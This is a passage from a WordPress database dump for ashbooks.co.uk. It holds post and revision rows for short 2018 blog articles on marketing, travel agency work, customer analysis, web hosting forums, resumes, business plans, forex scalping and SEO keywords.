09:50:52','',27,'https://ashbooks.co.uk/27-revision-v1',0,'revision','',0),(29,1,'2018-02-06 09:51:16','2018-02-06 09:51:16','Marketing consultants play an intricate role in the world of business. They deal with the nitty-gritty aspect of businesses. A marketing consultant is an advisor who directs companies towards accomplishing its goals and make higher turnovers. He or she is responsible for generating innovative concepts and ideas that usher clients to face their competitors head-on. From customer service to advertising schemes, efficient consultants prove highly beneficial to struggling as well as booming companies.\r\n\r\nPurpose Of Marketing Consultants\r\n\r\nIf you are looking to boost your marketing strategies and get maximum exposure for your business venture, consider consulting an expert advisor. It is essential to understand the role of a marketing consultant if you want guidance from someone with experience. Here are the key functions:\r\n\r\n· Advertising campaign analysis: The consultant is required to analyze your company’s latest advertising campaign to realize its strengths and weaknesses. Upon realizing, he or she must be able to provide you with valuable advice to enhance your marketing strategies.\r\n\r\n· Analysis of competition: He or she must be able to research and scrutinize marketing techniques used by your competitors and recommend tactics by which you can outshine them. This is the objective of a marketing consultant.\r\n\r\n· Pricing strategy: Price plays a big role in how customers shop. Your need an advisor who will be able to produce strategies that will cause customers to purchase your merchandise while your business makes high revenues.\r\n\r\n· Naming brands: A successful consultant will help you with popularizing your business with branding. An attractive brand name is vital as it allows your potential customers to readily identify your products and their quality.\r\n\r\nMaintaining Confidentiality\r\n\r\nMarketing consultants are problem solvers who thoroughly consider all the existing aspects of the business and generate the best solution for successful trade. They have inquisitive minds in order to dig to the core of unproductive companies to deal with the problem. For this reason, a marketing consultant must win your trust and keep confidential all your business secrets. If they cannot win your trust, look for someone who does if you don’t want your competitors knowing about them. Furthermore, avoid approaching the same person that your rivals consult.','Do Marketing Consultants Help Improve Business?','','publish','open','open','','do-marketing-consultants-help-improve-business','','','2018-02-06 10:45:02','2018-02-06 10:45:02','',0,'https://ashbooks.co.uk/?p=29',0,'post','',0),(30,1,'2018-02-06 09:51:16','2018-02-06 09:51:16','Marketing consultants play an intricate role in the world of business. They deal with the nitty-gritty aspect of businesses. A marketing consultant is an advisor who directs companies towards accomplishing its goals and make higher turnovers. He or she is responsible for generating innovative concepts and ideas that usher clients to face their competitors head-on. From customer service to advertising schemes, efficient consultants prove highly beneficial to struggling as well as booming companies.\r\n\r\nPurpose Of Marketing Consultants\r\n\r\nIf you are looking to boost your marketing strategies and get maximum exposure for your business venture, consider consulting an expert advisor. It is essential to understand the role of a marketing consultant if you want guidance from someone with experience. Here are the key functions:\r\n\r\n· Advertising campaign analysis: The consultant is required to analyze your company’s latest advertising campaign to realize its strengths and weaknesses. Upon realizing, he or she must be able to provide you with valuable advice to enhance your marketing strategies.\r\n\r\n· Analysis of competition: He or she must be able to research and scrutinize marketing techniques used by your competitors and recommend tactics by which you can outshine them. This is the objective of a marketing consultant.\r\n\r\n· Pricing strategy: Price plays a big role in how customers shop. Your need an advisor who will be able to produce strategies that will cause customers to purchase your merchandise while your business makes high revenues.\r\n\r\n· Naming brands: A successful consultant will help you with popularizing your business with branding. An attractive brand name is vital as it allows your potential customers to readily identify your products and their quality.\r\n\r\nMaintaining Confidentiality\r\n\r\nMarketing consultants are problem solvers who thoroughly consider all the existing aspects of the business and generate the best solution for successful trade. They have inquisitive minds in order to dig to the core of unproductive companies to deal with the problem. For this reason, a marketing consultant must win your trust and keep confidential all your business secrets. If they cannot win your trust, look for someone who does if you don’t want your competitors knowing about them. Furthermore, avoid approaching the same person that your rivals consult.','Do Marketing Consultants Help Improve Business?','','inherit','closed','closed','','29-revision-v1','','','2018-02-06 09:51:16','2018-02-06 09:51:16','',29,'https://ashbooks.co.uk/29-revision-v1',0,'revision','',0),(31,1,'2018-02-06 09:51:53','2018-02-06 09:51:53','Travel agency is such a business that can be initiated from an office or a home. The travel agency home business  is much more demanding than the other as most of the dealing is performed online and a lot of time is saved while busy in a different occupation. Though working during travels sounds to be tiring but look at its long term gains. Usually you have heard the travel agents to be busy only when new projects come but you can become a travel agent while you yourself are in a new project or rather on a new travel.\r\n\r\nBefore you become a  24 hour travel agent, you need to first travel through that agent which is going to make you his partner. Being satisfied with its performance, you find to form allies. The advantage of this alliance is that you would gain commission in terms of profits. Some experts have commented that this supplement is a great boost to the tr4avel industry. As your experience grows to switch on to the next level of travel agency home business, your commission rates increase not only as increments but also on the number of junior agents that you can collect during the travel visits.\r\n\r\nSuch practices make the global travelers to link up those travel agents working in remote areas. Interactions among world travel agents lead to exchange of ideas giving the travel businessman more world wide approach. Hence now with time you are ought to become 24 hour travel agent. As most of the agencies are online so travel agents work from home are much more available than offline. Online connectivity among the global agents makes it more transparent for the viewers to convert into travelers. International acceptance is very much required for a travel agency home business &lt;/a&gt; to reach its peak of success. Even now you take your travelers to places outside your country spreading your field of travel business.\r\n\r\nSo now the concept of travel with gain is now much clear now and ready to be accepted by you. Though it may seem to be a risky affair for some newcomers but if there are no risks in life then there are no gains. So may this holiday see you as a work home travel agent in your favorite destination with your family?','Earn While You Are Relaxing in your Travel','','publish','open','open','','earn-while-you-are-relaxing-in-your-travel','','','2018-02-06 10:44:58','2018-02-06 10:44:58','',0,'https://ashbooks.co.uk/?p=31',0,'post','',0),(32,1,'2018-02-06 09:51:53','2018-02-06 09:51:53','Travel agency is such a business that can be initiated from an office or a home. The travel agency home business  is much more demanding than the other as most of the dealing is performed online and a lot of time is saved while busy in a different occupation. Though working during travels sounds to be tiring but look at its long term gains. Usually you have heard the travel agents to be busy only when new projects come but you can become a travel agent while you yourself are in a new project or rather on a new travel.\r\n\r\nBefore you become a  24 hour travel agent, you need to first travel through that agent which is going to make you his partner. Being satisfied with its performance, you find to form allies. The advantage of this alliance is that you would gain commission in terms of profits. Some experts have commented that this supplement is a great boost to the tr4avel industry. As your experience grows to switch on to the next level of travel agency home business, your commission rates increase not only as increments but also on the number of junior agents that you can collect during the travel visits.\r\n\r\nSuch practices make the global travelers to link up those travel agents working in remote areas. Interactions among world travel agents lead to exchange of ideas giving the travel businessman more world wide approach. Hence now with time you are ought to become 24 hour travel agent. As most of the agencies are online so travel agents work from home are much more available than offline. Online connectivity among the global agents makes it more transparent for the viewers to convert into travelers. International acceptance is very much required for a travel agency home business &lt;/a&gt; to reach its peak of success. Even now you take your travelers to places outside your country spreading your field of travel business.\r\n\r\nSo now the concept of travel with gain is now much clear now and ready to be accepted by you. Though it may seem to be a risky affair for some newcomers but if there are no risks in life then there are no gains. So may this holiday see you as a work home travel agent in your favorite destination with your family?','Earn While You Are Relaxing in your Travel','','inherit','closed','closed','','31-revision-v1','','','2018-02-06 09:51:53','2018-02-06 09:51:53','',31,'https://ashbooks.co.uk/31-revision-v1',0,'revision','',0),(33,1,'2018-02-06 09:52:35','2018-02-06 09:52:35','When you are communicating with your customers it seems as you are talking to some alien of other word. This is just a scientific compliment, customers and sellers come from the same world. But still they are aliens because a seller doesn’t know exactly what the customer wants and how he would react under a particular state of mind. And moreover you also don’t know as what the consumer wants or expects from a particular product. This brings us to the study of consumer behavior and intelligence.\r\n\r\nNot all consumers are same and not all their wants can be satisfied with a single product. But here in opinion mining a set of consumers are evaluated and their demands and reaction to a particular product are analyzed. And on the whole an average is taken as the conclusion of whole evaluation.\r\n\r\nIn practical world, most of the companies don’t know about their consumers. Even those who try to get close to their clients struggle in getting reliable data and customer opinion. Who is the customer? What they want? Why they want? How they will get it? When they will get it? Is there a product or service available in the market that will complement their needs? Certainly these are the questions the answers to which all companies ought to know.\r\n\r\nWhen today’s markets have got so much competition, it become quite essential for the companies to attract new customers and keep the existing ones inbound. The companies need to maximize the value of each customer and promote the most profitable ones. To accomplish that there is need of opinion mining or analyze all pieces of customer information. This allows the companies to understand customer’s profitability and his preferences.\r\n\r\nCollection of data is just the half job done. And if a company is going to base their production based on data alone they are certainly going to be disappointed. Mere collection of data isn’t sufficient but there is need to evaluate the changing trends in the market and see how the consumer behavior has changed over time. Customers don’t just calculate what currently they are getting, but they are also interested to know as what they are going to get in coming years.\r\n\r\nHere you need to conduct customer satisfaction analysis in the past, current market trends and expected future scenarios. And also this consumer analysis is going to be limited by a number of factors like particular product, segment, demographic or any variable that a business chooses to isolate. All these things are going to significantly alter the end results of your analysis. A little change in one will bring a huge difference in the comparable results.\r\n\r\nThe next step is determination of normal range of behavior as how a consumer reacts to a particular product for a specific period of time. And finally you are to evaluate the alarming signals from the market.','Evaluating customer intelligence and behavior','','publish','open','open','','evaluating-customer-intelligence-and-behavior','','','2018-02-06 10:44:55','2018-02-06 10:44:55','',0,'https://ashbooks.co.uk/?p=33',0,'post','',0),(34,1,'2018-02-06 09:52:35','2018-02-06 09:52:35','When you are communicating with your customers it seems as you are talking to some alien of other word. This is just a scientific compliment, customers and sellers come from the same world. But still they are aliens because a seller doesn’t know exactly what the customer wants and how he would react under a particular state of mind. And moreover you also don’t know as what the consumer wants or expects from a particular product. This brings us to the study of consumer behavior and intelligence.\r\n\r\nNot all consumers are same and not all their wants can be satisfied with a single product. But here in opinion mining a set of consumers are evaluated and their demands and reaction to a particular product are analyzed. And on the whole an average is taken as the conclusion of whole evaluation.\r\n\r\nIn practical world, most of the companies don’t know about their consumers. Even those who try to get close to their clients struggle in getting reliable data and customer opinion. Who is the customer? What they want? Why they want? How they will get it? When they will get it? Is there a product or service available in the market that will complement their needs? Certainly these are the questions the answers to which all companies ought to know.\r\n\r\nWhen today’s markets have got so much competition, it become quite essential for the companies to attract new customers and keep the existing ones inbound. The companies need to maximize the value of each customer and promote the most profitable ones. To accomplish that there is need of opinion mining or analyze all pieces of customer information. This allows the companies to understand customer’s profitability and his preferences.\r\n\r\nCollection of data is just the half job done. And if a company is going to base their production based on data alone they are certainly going to be disappointed. Mere collection of data isn’t sufficient but there is need to evaluate the changing trends in the market and see how the consumer behavior has changed over time. Customers don’t just calculate what currently they are getting, but they are also interested to know as what they are going to get in coming years.\r\n\r\nHere you need to conduct customer satisfaction analysis in the past, current market trends and expected future scenarios. And also this consumer analysis is going to be limited by a number of factors like particular product, segment, demographic or any variable that a business chooses to isolate. All these things are going to significantly alter the end results of your analysis. A little change in one will bring a huge difference in the comparable results.\r\n\r\nThe next step is determination of normal range of behavior as how a consumer reacts to a particular product for a specific period of time. And finally you are to evaluate the alarming signals from the market.','Evaluating customer intelligence and behavior','','inherit','closed','closed','','33-revision-v1','','','2018-02-06 09:52:35','2018-02-06 09:52:35','',33,'https://ashbooks.co.uk/33-revision-v1',0,'revision','',0),(35,1,'2018-02-06 09:52:59','2018-02-06 09:52:59','Selling would be whole fun when you know what your customer wants. The basic problem that arises between a customer and a seller is when ideas of seller and buyer don’t comply. Consumers today are much rational and they know very clearly as what they want. And in the same manner sellers have to make up their minds and get to know as how they can settle on scores with customers.\r\n\r\nNow as a seller it won’t be that easy to get into somebody’s mind unless you are psychic. In that case a better alternative comes in the form of opinion mining. No matter how hard you try to read the mind of customer, cent percent success is entirely a rare shot. In that case this opinion mining can be a helpful tool that will let you know how consumer behaves to a particular commodity under specific set of conditions in a time. This may now involve any hard and fast rule to be followed but can be just a statistical evaluation that takes you close to the consumer preferences.\r\n\r\nOk while you are trying to mine out consumer thoughts and preferences a general concept that can be the base of your evaluation can be consumer preferences. Consumer preferences in many cases suffer from demonstration effect. Today this demonstration effect has a much bigger role to play. Usually individuals are much moved with what others are preferring and accordingly they base their preferences. So if you are able to calculate the preferences of a particular set of individuals you can accordingly know what others if not all majority of those will follow. Much of these trends are studied under the concept of customer intelligence.\r\n\r\nThere is much difference between the customers of today and what they used to be a decade or two ago. Even the markets today aren’t the same with a semi monopolistic tendency. The globalization and massive competition has enlarged not just the markets but the scope of choice for the consumers as well. There is a massive variety of products and there are equal numbers of choices among users. I know I have stated earlier demonstration effect, and it is still there but the preferences for a particular commodity and dependency over it has been significantly reduced since the markets remain thronged with close alternatives and complementary goods. These may not affect the consumer preferences but yes, the competition gets much tougher in course of time.\r\n\r\nHere managerial skills come into force under such circumstances. A business entrepreneur has to interpret consumer wants, commensurate them with this cost output analysis and other costs. Accordingly he has to manage the whole marketing strategy in a way that it not just attracts greater number of customers but also yield returns on investment. If a business entrepreneur is able to interpret voice of customer analysis and customer intelligence but also able to carry out a customer satisfaction analysis he can certainly strike better returns from his investment.','Evaluating customer satisfaction and gaining maximum returns','','publish','open','open','','evaluating-customer-satisfaction-and-gaining-maximum-returns','','','2018-02-06 10:44:50','2018-02-06 10:44:50','',0,'https://ashbooks.co.uk/?p=35',0,'post','',0),(36,1,'2018-02-06 09:52:59','2018-02-06 09:52:59','Selling would be whole fun when you know what your customer wants. The basic problem that arises between a customer and a seller is when ideas of seller and buyer don’t comply. Consumers today are much rational and they know very clearly as what they want. And in the same manner sellers have to make up their minds and get to know as how they can settle on scores with customers.\r\n\r\nNow as a seller it won’t be that easy to get into somebody’s mind unless you are psychic. In that case a better alternative comes in the form of opinion mining. No matter how hard you try to read the mind of customer, cent percent success is entirely a rare shot. In that case this opinion mining can be a helpful tool that will let you know how consumer behaves to a particular commodity under specific set of conditions in a time. This may now involve any hard and fast rule to be followed but can be just a statistical evaluation that takes you close to the consumer preferences.\r\n\r\nOk while you are trying to mine out consumer thoughts and preferences a general concept that can be the base of your evaluation can be consumer preferences. Consumer preferences in many cases suffer from demonstration effect. Today this demonstration effect has a much bigger role to play. Usually individuals are much moved with what others are preferring and accordingly they base their preferences. So if you are able to calculate the preferences of a particular set of individuals you can accordingly know what others if not all majority of those will follow. Much of these trends are studied under the concept of customer intelligence.\r\n\r\nThere is much difference between the customers of today and what they used to be a decade or two ago. Even the markets today aren’t the same with a semi monopolistic tendency. The globalization and massive competition has enlarged not just the markets but the scope of choice for the consumers as well. There is a massive variety of products and there are equal numbers of choices among users. I know I have stated earlier demonstration effect, and it is still there but the preferences for a particular commodity and dependency over it has been significantly reduced since the markets remain thronged with close alternatives and complementary goods. These may not affect the consumer preferences but yes, the competition gets much tougher in course of time.\r\n\r\nHere managerial skills come into force under such circumstances. A business entrepreneur has to interpret consumer wants, commensurate them with this cost output analysis and other costs. Accordingly he has to manage the whole marketing strategy in a way that it not just attracts greater number of customers but also yield returns on investment. If a business entrepreneur is able to interpret voice of customer analysis and customer intelligence but also able to carry out a customer satisfaction analysis he can certainly strike better returns from his investment.','Evaluating customer satisfaction and gaining maximum returns','','inherit','closed','closed','','35-revision-v1','','','2018-02-06 09:52:59','2018-02-06 09:52:59','',35,'https://ashbooks.co.uk/35-revision-v1',0,'revision','',0),(37,1,'2018-02-06 09:53:45','2018-02-06 09:53:45','Web hosting is a very critical process and especially in today\'s internet; there are a lot of hosts to confuse with. Thus, it is very advisable to know about at least the basic of the different web hosts to suit your style and your site. In addition to several tips and tweaks, the best options to know about this, is joining in this forum.\r\n\r\nSome of the major key benefits of joining such a forum are that, they contain experienced members who help beginners and novices for implementing their first websites successfully and they also post reviews to various hosts that might prove to be very useful to you. The reviews contain different aspects of the services offered by the net hosts accompanied by rating and sometimes they also provide the few basic concepts about hosting which should be known about websites and hosting irrespective of the type of websites which you want to host. They also provide detailed summary of the pros and cons of using various hosts and sometimes they also throw some basic tips to prevent you from getting crooked.\r\n\r\nTo get the best results, you can look at the top rated posts of the forum to get an overview of the hosts you wish to accept and in addition to that, you can also ask your personal questions to the moderators and experts who answer your query fairly soon depending on the traffic on the forum and the level of activity carried on the forums. They also provide technical details in case you want to dig deeper in the hosting and know more about the activity. The net site hosting forums often contain the latest news in the field that might also be helpful to get the best out of your website and hosting it to a larger platform.\r\n\r\nWith the coming of internet, there has been a boom in the field of information and websites have grown from the previous generations. Some of the forums which deliver knowledge about web site hosting are created by the hosts and are meant for the world wide web hosts so that they don\'t have to return empty handed. Along with the knowledge about websites and how to host, they also provide maintenance tips and tricks, how to tweaking the website for optimum performance and also increase the average amount of traffic per day to your websites depending on the type of website.','Web Hosting Forums','','publish','open','open','','web-hosting-forums','','','2018-02-06 10:44:46','2018-02-06 10:44:46','',0,'https://ashbooks.co.uk/?p=37',0,'post','',0),(38,1,'2018-02-06 09:53:45','2018-02-06 09:53:45','Web hosting is a very critical process and especially in today\'s internet; there are a lot of hosts to confuse with. Thus, it is very advisable to know about at least the basic of the different web hosts to suit your style and your site. In addition to several tips and tweaks, the best options to know about this, is joining in this forum.\r\n\r\nSome of the major key benefits of joining such a forum are that, they contain experienced members who help beginners and novices for implementing their first websites successfully and they also post reviews to various hosts that might prove to be very useful to you. The reviews contain different aspects of the services offered by the net hosts accompanied by rating and sometimes they also provide the few basic concepts about hosting which should be known about websites and hosting irrespective of the type of websites which you want to host. They also provide detailed summary of the pros and cons of using various hosts and sometimes they also throw some basic tips to prevent you from getting crooked.\r\n\r\nTo get the best results, you can look at the top rated posts of the forum to get an overview of the hosts you wish to accept and in addition to that, you can also ask your personal questions to the moderators and experts who answer your query fairly soon depending on the traffic on the forum and the level of activity carried on the forums. They also provide technical details in case you want to dig deeper in the hosting and know more about the activity. The net site hosting forums often contain the latest news in the field that might also be helpful to get the best out of your website and hosting it to a larger platform.\r\n\r\nWith the coming of internet, there has been a boom in the field of information and websites have grown from the previous generations. Some of the forums which deliver knowledge about web site hosting are created by the hosts and are meant for the world wide web hosts so that they don\'t have to return empty handed. Along with the knowledge about websites and how to host, they also provide maintenance tips and tricks, how to tweaking the website for optimum performance and also increase the average amount of traffic per day to your websites depending on the type of website.','Web Hosting Forums','','inherit','closed','closed','','37-revision-v1','','','2018-02-06 09:53:45','2018-02-06 09:53:45','',37,'https://ashbooks.co.uk/37-revision-v1',0,'revision','',0),(39,1,'2018-02-06 09:54:25','2018-02-06 09:54:25','Importance of Resume Objectives and Cover Letter.\r\n\r\nPeople while creating their resume often tend to state an objective. Adding an objective can help the employers indentify with your profile. One needs to be clear about the employment goals. The same thing goes for the cover letter as well. Both cover letter and resume complement each other and increase your chances of getting a job. Cover letter is an important tool to convince the prospective employer to have a look at your resume. Nowadays most jobs require you to send a resume through email. A cover letter does not help you get a job, but if the person to whom you have sent the mail opens the resume, then your cover letter has done its job.\r\n\r\nIf you are adding an objective in your resume, make sure to customize it according to the job you are applying for. The better the resume objective is, the more is your chances of you landing a job. However adding a resume objective can get a bit tricky (depending upon whom you send the resume to).\r\n\r\nThere are some guidelines to decide whether your resume requires an objective.\r\n\r\n· Who will see the resume\r\n\r\n· What do you want to accomplish\r\n\r\n· What to write in a resume objectives if you have decided to include it\r\n\r\nSome common examples of resume objectives are:\r\n\r\n· To work in a challenging environment that helps me use my talents and encourages learning\r\n\r\n· To work as a content writer and evolve my talents to help the company\r\n\r\n· To make a career in the fashion industry and stat my own line of clothing\r\n\r\n· To work as a customer advisor where my experience can come handy to increase customer satisfaction\r\n\r\nA cover letter can also be used by the applicant to target the type of job he/she wants. A cover letter allows a job seeker to communicate in depth and helps them focus on desired objectives. Employers want applicants to be aware that a cover letter has to be professional. Think out of the box and engage the recruiter; engaging the recruiter will enable them to consider your profile.\r\n\r\nBy using this important tool, you can convey desired employment objectives and show the employer why you are the most-suited person for the job.','How Important is a Resume Objective and Cover letter','','publish','open','open','','how-important-is-a-resume-objective-and-cover-letter','','','2018-02-06 10:44:41','2018-02-06 10:44:41','',0,'https://ashbooks.co.uk/?p=39',0,'post','',0),(40,1,'2018-02-06 09:54:25','2018-02-06 09:54:25','Importance of Resume Objectives and Cover Letter.\r\n\r\nPeople while creating their resume often tend to state an objective. Adding an objective can help the employers indentify with your profile. One needs to be clear about the employment goals. The same thing goes for the cover letter as well. Both cover letter and resume complement each other and increase your chances of getting a job. Cover letter is an important tool to convince the prospective employer to have a look at your resume. Nowadays most jobs require you to send a resume through email. A cover letter does not help you get a job, but if the person to whom you have sent the mail opens the resume, then your cover letter has done its job.\r\n\r\nIf you are adding an objective in your resume, make sure to customize it according to the job you are applying for. The better the resume objective is, the more is your chances of you landing a job. However adding a resume objective can get a bit tricky (depending upon whom you send the resume to).\r\n\r\nThere are some guidelines to decide whether your resume requires an objective.\r\n\r\n· Who will see the resume\r\n\r\n· What do you want to accomplish\r\n\r\n· What to write in a resume objectives if you have decided to include it\r\n\r\nSome common examples of resume objectives are:\r\n\r\n· To work in a challenging environment that helps me use my talents and encourages learning\r\n\r\n· To work as a content writer and evolve my talents to help the company\r\n\r\n· To make a career in the fashion industry and stat my own line of clothing\r\n\r\n· To work as a customer advisor where my experience can come handy to increase customer satisfaction\r\n\r\nA cover letter can also be used by the applicant to target the type of job he/she wants. A cover letter allows a job seeker to communicate in depth and helps them focus on desired objectives. Employers want applicants to be aware that a cover letter has to be professional. Think out of the box and engage the recruiter; engaging the recruiter will enable them to consider your profile.\r\n\r\nBy using this important tool, you can convey desired employment objectives and show the employer why you are the most-suited person for the job.','How Important is a Resume Objective and Cover letter','','inherit','closed','closed','','39-revision-v1','','','2018-02-06 09:54:25','2018-02-06 09:54:25','',39,'https://ashbooks.co.uk/39-revision-v1',0,'revision','',0),(41,1,'2018-02-06 09:54:59','2018-02-06 09:54:59','Starting one’s own business is so exciting. One can get to do what one wants and the way one wants. But it is equally important to have a rough idea of what one wants to do and how is one going to achieve it. It may not include minor details but it will be good to have a broader perspective in place. It becomes all the more important to have a plan in place of one is expecting to invest a good amount of money. Factors such as break even analysis, Profit loss ratio and other factor may be included in a business plans. One can take help from different professional plans that are available if one is interested in opening one’s own business but has limited commercial know how. These plans are really helpful for housewives, senior citizens and may be a good way to mange ones affair. The main features of business plans include an easy way to document ones day to day affair. Business Plan Examples include both small and medium size business. For example, a coffee book shop can be cited as a small Business Plan Example.\r\n\r\nA Business plan Template is usually a template that is very easy to customize. It contains all the information that is essential for any business. Initially such templates were available in hard copy format but are now mostly available as software. Many templates are also available in formats that are compatible with various word editors. Most of the computer based template will have an excel file. Excel files are primarily the most convenient ways to keep records. They also help in fast data processing with the availability of customized and prebuilt formulas. It is quite likely that Business plan Template may be having pro-format spreadsheets. These sheets come with different headers. One just needs to fill it with data in order to check important future projections. A pro-forma template sheet can be copied in order to get multiple sheets in which records of different months can be kept. Another important component of business template is a break even graph. This graph essentially tells by when one can expect to recover the investments done in the business.\r\n\r\nAn example of a Coffee Shop Business Plan is a good Business Plan Example to make one get an idea of how do business templates work. A Coffee Shop Business Plan includes firs to make a list of the monthly expenditures. This includes electricity costs, raw material costs, labor costs, etc. A business template will have an expenditure table where one can input these under the Expenditure column. One will also have to record the daily cash flow. A monthly cash inflow and out flow table will let one to input these figures. A monthly sales graph section can help one to understand the patterns of the customers. There will be some days that will greater sale than the other. One can find the days on which sales have been lower and try to find out the exact ways to improve sales on those days. Likewise there are many other Business Plan Examples where business templates can be useful.','Business plan Template – An easy way to maintain and keep a tab on the progress of business','','publish','open','open','','business-plan-template-an-easy-way-to-maintain-and-keep-a-tab-on-the-progress-of-business','','','2018-02-06 10:44:38','2018-02-06 10:44:38','',0,'https://ashbooks.co.uk/?p=41',0,'post','',0),(42,1,'2018-02-06 09:54:59','2018-02-06 09:54:59','Starting one’s own business is so exciting. One can get to do what one wants and the way one wants. But it is equally important to have a rough idea of what one wants to do and how is one going to achieve it. It may not include minor details but it will be good to have a broader perspective in place. It becomes all the more important to have a plan in place of one is expecting to invest a good amount of money. Factors such as break even analysis, Profit loss ratio and other factor may be included in a business plans. One can take help from different professional plans that are available if one is interested in opening one’s own business but has limited commercial know how. These plans are really helpful for housewives, senior citizens and may be a good way to mange ones affair. The main features of business plans include an easy way to document ones day to day affair. Business Plan Examples include both small and medium size business. For example, a coffee book shop can be cited as a small Business Plan Example.\r\n\r\nA Business plan Template is usually a template that is very easy to customize. It contains all the information that is essential for any business. Initially such templates were available in hard copy format but are now mostly available as software. Many templates are also available in formats that are compatible with various word editors. Most of the computer based template will have an excel file. Excel files are primarily the most convenient ways to keep records. They also help in fast data processing with the availability of customized and prebuilt formulas. It is quite likely that Business plan Template may be having pro-format spreadsheets. These sheets come with different headers. One just needs to fill it with data in order to check important future projections. A pro-forma template sheet can be copied in order to get multiple sheets in which records of different months can be kept. Another important component of business template is a break even graph. This graph essentially tells by when one can expect to recover the investments done in the business.\r\n\r\nAn example of a Coffee Shop Business Plan is a good Business Plan Example to make one get an idea of how do business templates work. A Coffee Shop Business Plan includes firs to make a list of the monthly expenditures. This includes electricity costs, raw material costs, labor costs, etc. A business template will have an expenditure table where one can input these under the Expenditure column. One will also have to record the daily cash flow. A monthly cash inflow and out flow table will let one to input these figures. A monthly sales graph section can help one to understand the patterns of the customers. There will be some days that will greater sale than the other. One can find the days on which sales have been lower and try to find out the exact ways to improve sales on those days. Likewise there are many other Business Plan Examples where business templates can be useful.','Business plan Template – An easy way to maintain and keep a tab on the progress of business','','inherit','closed','closed','','41-revision-v1','','','2018-02-06 09:54:59','2018-02-06 09:54:59','',41,'https://ashbooks.co.uk/41-revision-v1',0,'revision','',0),(43,1,'2018-02-06 09:55:36','2018-02-06 09:55:36','Forex trading has been so lucrative in recent years that the entry of investors into this kind of trading is a matter of awe. The sheer number in itself is mind-boggling and the millions of dollars that go into trade everyday are exhausting. People from different streams of life are investing in foreign currency exchange market, which in earlier days was the bastion of the rich and bankers.\r\n\r\nThe investment that was required in the forex market had to be in large amounts in order to gain a huge profit, since the change in the value of the currencies is quite small. Moreover, the concept was not well-known in many circles. As time progressed and the analysis of the currency market could be done, the small time investors and common people could avail the facilities. Also, the introduction of various platforms for the forex trading gave the common man a smoother transaction facility.\r\n\r\nNow that the forex market became easily accessible to the common man, people started working towards gaining profits by investing in the forex. Different strategies were devised to gain profits, one of which was the use of scalping strategies. This is a volatile method of making profits by investing in the foreign currency market. It is usually done by making investment in the currencies in a very quick interval of time.\r\n\r\nBuying at a certain price and selling in a matter of few minutes with a favorable change is the essence of the scalpers, the term given to people who indulge in this kind of trading. Although the process is profitable, it requires patience and keen observation on part of the investors. One is required to be on the alert and watches the proceedings of the forex market continuously. These people involved in scalping strategies try to see the changes and are also considered good players in the forex market.\r\n\r\nProfits can be huge if scalping is done, but this is not something that could be possible for everyone. Moreover, the risk factor of losing the invested amount is always there. But, those people who have been doing such procedures have worked out some kind of strategy and are keen on making profits. They wait and watch and quickly enter the market and immediately withdraw their money.\r\n\r\nSuch scalping strategies are gradually becoming famous these days as more and more people are realizing that the forex market is lucrative. Such a mindset is also being developed by the real-time transaction facilities provided by the improvised platforms throughout the world.','Employ Scalping Strategies to Make Quick Profits in Many Small Amounts','','publish','open','open','','employ-scalping-strategies-to-make-quick-profits-in-many-small-amounts','','','2018-02-06 10:44:32','2018-02-06 10:44:32','',0,'https://ashbooks.co.uk/?p=43',0,'post','',0),(44,1,'2018-02-06 09:55:36','2018-02-06 09:55:36','Forex trading has been so lucrative in recent years that the entry of investors into this kind of trading is a matter of awe. The sheer number in itself is mind-boggling and the millions of dollars that go into trade everyday are exhausting. People from different streams of life are investing in foreign currency exchange market, which in earlier days was the bastion of the rich and bankers.\r\n\r\nThe investment that was required in the forex market had to be in large amounts in order to gain a huge profit, since the change in the value of the currencies is quite small. Moreover, the concept was not well-known in many circles. As time progressed and the analysis of the currency market could be done, the small time investors and common people could avail the facilities. Also, the introduction of various platforms for the forex trading gave the common man a smoother transaction facility.\r\n\r\nNow that the forex market became easily accessible to the common man, people started working towards gaining profits by investing in the forex. Different strategies were devised to gain profits, one of which was the use of scalping strategies. This is a volatile method of making profits by investing in the foreign currency market. It is usually done by making investment in the currencies in a very quick interval of time.\r\n\r\nBuying at a certain price and selling in a matter of few minutes with a favorable change is the essence of the scalpers, the term given to people who indulge in this kind of trading. Although the process is profitable, it requires patience and keen observation on part of the investors. One is required to be on the alert and watches the proceedings of the forex market continuously. These people involved in scalping strategies try to see the changes and are also considered good players in the forex market.\r\n\r\nProfits can be huge if scalping is done, but this is not something that could be possible for everyone. Moreover, the risk factor of losing the invested amount is always there. But, those people who have been doing such procedures have worked out some kind of strategy and are keen on making profits. They wait and watch and quickly enter the market and immediately withdraw their money.\r\n\r\nSuch scalping strategies are gradually becoming famous these days as more and more people are realizing that the forex market is lucrative. Such a mindset is also being developed by the real-time transaction facilities provided by the improvised platforms throughout the world.','Employ Scalping Strategies to Make Quick Profits in Many Small Amounts','','inherit','closed','closed','','43-revision-v1','','','2018-02-06 09:55:36','2018-02-06 09:55:36','',43,'https://ashbooks.co.uk/43-revision-v1',0,'revision','',0),(45,1,'2018-02-06 09:56:26','2018-02-06 09:56:26','Keeping away from the usual known SEO Pitfalls : Choosing the niche keywords to optimize for a website is one of the most crucial aspects of SEO strategic planning and implementation. This stage acts as the footstone and if done well can lay a concrete foundation for building the rest of the optimization techniques that are to be implemented in the future. Even the most experienced optimization experts may sometime overlook the importance of this and target the highly competitive keywords hence causing a newly built site to face crucial set-backs in the SERP\'s. An ideal choice of keywords for optimization a website requires a perfect combination of research and modesty.\r\nb. Listing Down Specific Keywords During Start-up : If you have a website that sells products, services, in that case it becomes crucial to ensure that the choice of keywords are highly related to the niche. On the contrary, choosing general/non-specific keywords would usually result in greater competition that might weaken your chances of getting ranked well in the search results. If computer parts and peripherals form the niche of your site, then optimizing the website for LCD Monitor screens, keyboards, ram, i5/i7/intel processor, and the most detailed components that you are offering must be chosen to work upon. Do you also offer AMD processors ? Are there any colours that an end user may choose from? What are the brands offered? , the more the detailed keywords you choose, you get a better chance be to ranked well for those keywords in SERP\'s. It is even observed that when a user finds your webpage for a particular search phrase, the probability of convertion is higher as compared to non-specific keywords.\r\n\r\nc. You may choose to row your foot into a reagionalised market instead of going straight for the targeted one\'s, this can make you face a much reduced competition and may yield better results to begin with. If you are a provider who operates only in the UK, you must ensure that most of the specific phrases are included (such as : United Kingdom, England, London, etc.) within title tags, body , and the anchor text of the webpage. When building a new site, despite your intentions of expanding your business globally, it is usually better to focus on the regional market first, once its set firm in there, you may think of expansion. Once these keywords perform well and you have the logistic capabilities to grow your business to target different overseas markets, then you can start to optimise your site to reflect your general business strategies.','Designing a Region Based Business Strategy','','publish','open','open','','designing-a-region-based-business-strategy','','','2018-02-06 10:44:29','2018-02-06 